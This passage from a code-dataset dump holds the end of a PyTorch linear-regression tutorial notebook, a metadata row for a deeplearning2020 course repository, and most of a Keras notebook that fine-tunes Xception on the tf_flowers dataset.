"torch.manual_seed(42)\n# Building the model from the figure above\nmodel = nn.Sequential()\nmodel.add_module('layer1', nn.Linear(3, 5))\nmodel.add_module('layer2', nn.Linear(5, 1))\nmodel.to(device)",
"_____no_output_____"
]
],
[
[
"# Putting It All Together",
"_____no_output_____"
],
[
"## Data Preparation",
"_____no_output_____"
],
[
"### Data Preparation V0",
"_____no_output_____"
]
],
[
[
"%%writefile data_preparation/v0.py\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Our data was in Numpy arrays, but we need to transform them\n# into PyTorch's Tensors and then we send them to the \n# chosen device\nx_train_tensor = torch.as_tensor(x_train).float().to(device)\ny_train_tensor = torch.as_tensor(y_train).float().to(device)",
"Overwriting data_preparation/v0.py\n"
],
[
"%run -i data_preparation/v0.py",
"_____no_output_____"
]
],
[
[
"## Model Configurtion",
"_____no_output_____"
],
[
"### Model Configuration V0",
"_____no_output_____"
]
],
[
[
"%%writefile model_configuration/v0.py\n\n# This is redundant now, but it won't be when we introduce\n# Datasets...\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\ntorch.manual_seed(42)\n# Now we can create a model and send it at once to the device\nmodel = nn.Sequential(nn.Linear(1, 1)).to(device)\n\n# Defines a SGD optimizer to update the parameters \n# (now retrieved directly from the model)\noptimizer = optim.SGD(model.parameters(), lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')",
"Overwriting model_configuration/v0.py\n"
],
[
"%run -i model_configuration/v0.py",
"_____no_output_____"
]
],
[
[
"## Model Training",
"_____no_output_____"
],
[
"### Model Training V0",
"_____no_output_____"
]
],
[
[
"%%writefile model_training/v0.py\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Sets model to TRAIN mode\n model.train()\n\n # Step 1 - Computes model's predicted output - forward pass\n yhat = model(x_train_tensor)\n \n # Step 2 - Computes the loss\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate\n optimizer.step()\n optimizer.zero_grad()",
"Overwriting model_training/v0.py\n"
],
[
"%run -i model_training/v0.py",
"_____no_output_____"
],
[
"print(model.state_dict())",
"OrderedDict([('0.weight', tensor([[1.9690]], device='cuda:0')), ('0.bias', tensor([1.0235], device='cuda:0'))])\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb2a673ca61dba56314fbfb5a1f12fe1375945b7 | 708,322 | ipynb | Jupyter Notebook | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 133 | 2020-03-11T09:56:22.000Z | 2022-01-03T08:27:00.000Z | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 10 | 2020-03-12T15:02:46.000Z | 2020-11-27T21:21:42.000Z | woche4/notebooks/transfer-learning/transfer-learning.ipynb | aheyer/deeplearning2020 | 0bd8807649c3de9266a8fd73d03e05ed2e5b0cb9 | [
"MIT"
] | 64 | 2020-03-12T08:11:38.000Z | 2021-06-25T08:45:53.000Z | 645.690064 | 607,726 | 0.927787 | [
[
[
"# Transfer Learning\n## Imports and Version Selection\n",
"_____no_output_____"
]
],
[
[
"# TensorFlow ≥2.0 is required for this notebook\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n# check if GPU is available as this notebook will be very slow without GPU\nif not tf.test.is_gpu_available():\n print(\"No GPU was detected. CNNs can be very slow without a GPU.\")\n if IS_COLAB:\n print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n",
"WARNING:tensorflow:From <ipython-input-1-8f63222163f0>:6: is_gpu_available (from tensorflow.python.framework.test_util) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse `tf.config.list_physical_devices('GPU')` instead.\n"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import Dense, Activation, Input, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization, GaussianNoise\nfrom tensorflow.keras.models import Model\nimport matplotlib.pyplot as plt\n\n!pip install --upgrade deeplearning2020\nfrom deeplearning2020 import helpers\n\n# jupyters magic command\n%matplotlib inline",
"Collecting deeplearning2020\n Downloading https://files.pythonhosted.org/packages/63/41/8069878771ff9fe61ad5776f2c428606b904bdf6e9a03d75fe64c8595f5b/deeplearning2020-0.4.18.tar.gz\nCollecting kerasltisubmission>=0.4.9\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/de/56/0b6adef8e6f5d89e9daa68e03d00850509f1553ce6303c0a49d7c619dd26/kerasltisubmission-0.4.9.tar.gz (392kB)\n\u001b[K |████████████████████████████████| 399kB 4.1MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numpy in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (1.18.2)\nRequirement already satisfied, skipping upgrade: progressbar2 in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (3.38.0)\nRequirement already satisfied, skipping upgrade: requests in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (2.21.0)\nRequirement already satisfied, skipping upgrade: six in /usr/local/lib/python3.6/dist-packages (from progressbar2->kerasltisubmission>=0.4.9->deeplearning2020) (1.12.0)\nRequirement already satisfied, skipping upgrade: python-utils>=2.3.0 in /usr/local/lib/python3.6/dist-packages (from progressbar2->kerasltisubmission>=0.4.9->deeplearning2020) (2.4.0)\nRequirement already satisfied, skipping upgrade: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (2019.11.28)\nRequirement already satisfied, skipping upgrade: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (3.0.4)\nRequirement already satisfied, skipping upgrade: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (2.8)\nRequirement already satisfied, skipping upgrade: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (1.24.3)\nBuilding wheels for collected packages: deeplearning2020, kerasltisubmission\n Building wheel for deeplearning2020 (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for deeplearning2020: filename=deeplearning2020-0.4.18-py2.py3-none-any.whl size=8393 sha256=ff7f4a24d9cf5721e9ce2c9d5e594a3643f64a82898d3eec562278fad25a8465\n Stored in directory: /root/.cache/pip/wheels/c9/24/f5/8258a898fd2cd12315ca220f208be60cc08dc29bc6bd73a0df\n Building wheel for kerasltisubmission (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for kerasltisubmission: filename=kerasltisubmission-0.4.9-py2.py3-none-any.whl size=8867 sha256=0ae6bbc142f8b6525904924101fcddf5d091cf2adcf6d28cb14b1daf3ecc769b\n Stored in directory: /root/.cache/pip/wheels/fd/61/f7/09171376b25408ae21b58e98c9fbf2eb924f676bb77659f983\nSuccessfully built deeplearning2020 kerasltisubmission\nInstalling collected packages: kerasltisubmission, deeplearning2020\nSuccessfully installed deeplearning2020-0.4.18 kerasltisubmission-0.4.9\n"
],
[
"# resize the images to a uniform size\ndef preprocess(image, label):\n resized_image = tf.image.resize(image, [224, 224])\n # run Xceptions preprocessing function\n preprocessed_image = tf.keras.applications.xception.preprocess_input(resized_image)\n return preprocessed_image, label",
"_____no_output_____"
]
],
[
[
"## Loading and Preprocessing",
"_____no_output_____"
]
],
[
[
"# download the dataset with labels and with information about the data\ndata, info = tfds.load(\"tf_flowers\", as_supervised=True, with_info=True)\n\n# print the most important information\ndataset_size = info.splits['train'].num_examples\nprint('dataset size: ', dataset_size)\nclass_names = info.features['label'].names\nprint('class names: ', class_names)\nn_classes = info.features['label'].num_classes\nprint('number of classes: ', n_classes)\n\nbatch_size = 32\n\ntry:\n train_data = tfds.load('tf_flowers', split=\"train[:80%]\", as_supervised=True)\n test_data = tfds.load('tf_flowers', split=\"train[80%:100%]\", as_supervised=True)\n train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)\n test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)\nexcept(Exception):\n # split the data into train and test data with a 8:2 ratio\n train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])\n train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)\n test_data = tfds.load('tf_flowers', split=test_split, as_supervised=True)\n train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)\n test_data = test_data.map(preprocess).batch(batch_size).prefetch(1) ",
"dataset size: 3670\nclass names: ['dandelion', 'daisy', 'tulips', 'sunflowers', 'roses']\nnumber of classes: 5\n"
],
[
"# show some images from the dataset\nhelpers.plot_images(train_data.unbatch().take(9).map(lambda x, y: ((x + 1) / 2, y)), class_names)",
"_____no_output_____"
]
],
[
[
"## Definition and Training",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\n\n# build a transfer learning model with Xception and a new Fully-Connected-Classifier\nbase_model = Xception(\n weights='imagenet',\n include_top=False\n)\nmodel = GlobalAveragePooling2D()(base_model.output)\nmodel = Dropout(0.5)(model)\n\n# include new Fully-Connected-Classifier\noutput_layer = Dense(n_classes, activation='softmax')(model)\n\n# create Model\nmodel = Model(base_model.input, output_layer)",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) [(None, None, None, 0 \n__________________________________________________________________________________________________\nblock1_conv1 (Conv2D) (None, None, None, 3 864 input_2[0][0] \n__________________________________________________________________________________________________\nblock1_conv1_bn (BatchNormaliza (None, None, None, 3 128 block1_conv1[0][0] \n__________________________________________________________________________________________________\nblock1_conv1_act (Activation) (None, None, None, 3 0 block1_conv1_bn[0][0] \n__________________________________________________________________________________________________\nblock1_conv2 (Conv2D) (None, None, None, 6 18432 block1_conv1_act[0][0] \n__________________________________________________________________________________________________\nblock1_conv2_bn (BatchNormaliza (None, None, None, 6 256 block1_conv2[0][0] \n__________________________________________________________________________________________________\nblock1_conv2_act (Activation) (None, None, None, 6 0 block1_conv2_bn[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv1 (SeparableConv2 (None, None, None, 1 8768 block1_conv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv1_bn (BatchNormal (None, None, None, 1 512 block2_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2_act (Activation (None, None, None, 1 0 block2_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2 (SeparableConv2 (None, None, None, 1 17536 block2_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2_bn (BatchNormal (None, None, None, 1 512 block2_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, None, None, 1 8192 block1_conv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_pool (MaxPooling2D) (None, None, None, 1 0 block2_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_4 (BatchNor (None, None, None, 1 512 conv2d_4[0][0] \n__________________________________________________________________________________________________\nadd_12 (Add) (None, None, None, 1 0 block2_pool[0][0] \n batch_normalization_4[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1_act (Activation (None, None, None, 1 0 add_12[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1 (SeparableConv2 (None, None, None, 2 33920 block3_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1_bn (BatchNormal (None, None, None, 2 1024 block3_sepconv1[0][0] 
\n__________________________________________________________________________________________________\nblock3_sepconv2_act (Activation (None, None, None, 2 0 block3_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv2 (SeparableConv2 (None, None, None, 2 67840 block3_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv2_bn (BatchNormal (None, None, None, 2 1024 block3_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, None, None, 2 32768 add_12[0][0] \n__________________________________________________________________________________________________\nblock3_pool (MaxPooling2D) (None, None, None, 2 0 block3_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_5 (BatchNor (None, None, None, 2 1024 conv2d_5[0][0] \n__________________________________________________________________________________________________\nadd_13 (Add) (None, None, None, 2 0 block3_pool[0][0] \n batch_normalization_5[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1_act (Activation (None, None, None, 2 0 add_13[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1 (SeparableConv2 (None, None, None, 7 188672 block4_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block4_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2_act (Activation (None, None, None, 7 0 block4_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block4_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block4_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, None, None, 7 186368 add_13[0][0] \n__________________________________________________________________________________________________\nblock4_pool (MaxPooling2D) (None, None, None, 7 0 block4_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_6 (BatchNor (None, None, None, 7 2912 conv2d_6[0][0] \n__________________________________________________________________________________________________\nadd_14 (Add) (None, None, None, 7 0 block4_pool[0][0] \n batch_normalization_6[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1_act (Activation (None, None, None, 7 0 add_14[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1_bn (BatchNormal (None, None, None, 7 
2912 block5_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2_act (Activation (None, None, None, 7 0 block5_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block5_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3_act (Activation (None, None, None, 7 0 block5_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block5_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_15 (Add) (None, None, None, 7 0 block5_sepconv3_bn[0][0] \n add_14[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1_act (Activation (None, None, None, 7 0 add_15[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2_act (Activation (None, None, None, 7 0 block6_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3_act (Activation (None, None, None, 7 0 block6_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_16 (Add) (None, None, None, 7 0 block6_sepconv3_bn[0][0] \n add_15[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv1_act (Activation (None, None, None, 7 0 add_16[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv1_act[0][0] 
\n__________________________________________________________________________________________________\nblock7_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2_act (Activation (None, None, None, 7 0 block7_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3_act (Activation (None, None, None, 7 0 block7_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_17 (Add) (None, None, None, 7 0 block7_sepconv3_bn[0][0] \n add_16[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1_act (Activation (None, None, None, 7 0 add_17[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2_act (Activation (None, None, None, 7 0 block8_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3_act (Activation (None, None, None, 7 0 block8_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_18 (Add) (None, None, None, 7 0 block8_sepconv3_bn[0][0] \n add_17[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv1_act (Activation (None, None, None, 7 0 add_18[0][0] 
\n__________________________________________________________________________________________________\nblock9_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2_act (Activation (None, None, None, 7 0 block9_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3_act (Activation (None, None, None, 7 0 block9_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_19 (Add) (None, None, None, 7 0 block9_sepconv3_bn[0][0] \n add_18[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1_act (Activatio (None, None, None, 7 0 add_19[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1 (SeparableConv (None, None, None, 7 536536 block10_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2_act (Activatio (None, None, None, 7 0 block10_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2 (SeparableConv (None, None, None, 7 536536 block10_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3_act (Activatio (None, None, None, 7 0 block10_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3 (SeparableConv (None, None, None, 7 536536 block10_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_20 (Add) (None, None, None, 7 0 block10_sepconv3_bn[0][0] \n add_19[0][0] 
\n__________________________________________________________________________________________________\nblock11_sepconv1_act (Activatio (None, None, None, 7 0 add_20[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv1 (SeparableConv (None, None, None, 7 536536 block11_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2_act (Activatio (None, None, None, 7 0 block11_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2 (SeparableConv (None, None, None, 7 536536 block11_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3_act (Activatio (None, None, None, 7 0 block11_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3 (SeparableConv (None, None, None, 7 536536 block11_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_21 (Add) (None, None, None, 7 0 block11_sepconv3_bn[0][0] \n add_20[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1_act (Activatio (None, None, None, 7 0 add_21[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1 (SeparableConv (None, None, None, 7 536536 block12_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2_act (Activatio (None, None, None, 7 0 block12_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2 (SeparableConv (None, None, None, 7 536536 block12_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3_act (Activatio (None, None, None, 7 0 block12_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3 (SeparableConv (None, None, None, 7 536536 block12_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv3[0][0] 
\n__________________________________________________________________________________________________\nadd_22 (Add) (None, None, None, 7 0 block12_sepconv3_bn[0][0] \n add_21[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1_act (Activatio (None, None, None, 7 0 add_22[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1 (SeparableConv (None, None, None, 7 536536 block13_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block13_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2_act (Activatio (None, None, None, 7 0 block13_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2 (SeparableConv (None, None, None, 1 752024 block13_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2_bn (BatchNorma (None, None, None, 1 4096 block13_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, None, None, 1 745472 add_22[0][0] \n__________________________________________________________________________________________________\nblock13_pool (MaxPooling2D) (None, None, None, 1 0 block13_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_7 (BatchNor (None, None, None, 1 4096 conv2d_7[0][0] \n__________________________________________________________________________________________________\nadd_23 (Add) (None, None, None, 1 0 block13_pool[0][0] \n batch_normalization_7[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1 (SeparableConv (None, None, None, 1 1582080 add_23[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1_bn (BatchNorma (None, None, None, 1 6144 block14_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1_act (Activatio (None, None, None, 1 0 block14_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2 (SeparableConv (None, None, None, 2 3159552 block14_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2_bn (BatchNorma (None, None, None, 2 8192 block14_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2_act (Activatio (None, None, None, 2 0 block14_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nglobal_average_pooling2d_1 (Glo (None, 2048) 0 block14_sepconv2_act[0][0] \n__________________________________________________________________________________________________\ndropout_1 (Dropout) (None, 2048) 0 global_average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 5) 
10245 dropout_1[0][0] \n==================================================================================================\nTotal params: 20,871,725\nTrainable params: 20,817,197\nNon-trainable params: 54,528\n__________________________________________________________________________________________________\n"
],
[
"# set the pretrained layers to not trainable because\n# there are already trained and we don't want to destroy\n# their weights\nfor layer in base_model.layers:\n layer.trainable = False",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory = model.fit(\n train_data,\n epochs=5,\n validation_data=test_data\n)",
